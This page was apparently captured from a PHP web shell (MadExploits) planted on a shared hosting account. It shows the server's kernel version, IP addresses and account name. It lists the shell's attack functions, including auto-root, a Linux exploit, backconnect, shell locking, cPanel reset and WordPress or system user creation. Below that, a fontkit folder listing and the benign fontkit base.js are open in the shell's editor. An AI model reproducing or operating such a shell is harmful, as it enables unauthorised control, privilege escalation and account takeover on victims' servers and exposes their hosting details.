Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
fontkit /
[ HOME SHELL ]
Name
Size
Permission
Action
node_modules
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
README.md
13.05
KB
-rw-r--r--
base.js
1.54
KB
-rw-r--r--
base.js.map
2.87
KB
-rw-r--r--
data.trie
526
B
-rw-r--r--
index.js
508.65
KB
-rw-r--r--
index.js.map
722.89
KB
-rw-r--r--
indic.trie
3.87
KB
-rw-r--r--
package.json
2.46
KB
-rw-r--r--
use.trie
3.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : base.js
'use strict'; function _interopDefault (ex) { return (ex && (typeof ex === 'object') && 'default' in ex) ? ex['default'] : ex; } var r = _interopDefault(require('restructure')); var fs = require('fs'); var fontkit = {}; fontkit.logErrors = false; var formats = []; fontkit.registerFormat = function (format) { formats.push(format); }; fontkit.openSync = function (filename, postscriptName) { var buffer = fs.readFileSync(filename); return fontkit.create(buffer, postscriptName); }; fontkit.open = function (filename, postscriptName, callback) { if (typeof postscriptName === 'function') { callback = postscriptName; postscriptName = null; } fs.readFile(filename, function (err, buffer) { if (err) { return callback(err); } try { var font = fontkit.create(buffer, postscriptName); } catch (e) { return callback(e); } return callback(null, font); }); return; }; fontkit.create = function (buffer, postscriptName) { for (var i = 0; i < formats.length; i++) { var format = formats[i]; if (format.probe(buffer)) { var font = new format(new r.DecodeStream(buffer)); if (postscriptName) { return font.getFont(postscriptName); } return font; } } throw new Error('Unknown font format'); }; fontkit.defaultLanguage = 'en'; fontkit.setDefaultLanguage = function () { var lang = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'en'; fontkit.defaultLanguage = lang; }; module.exports = fontkit; //# sourceMappingURL=base.js.map
Close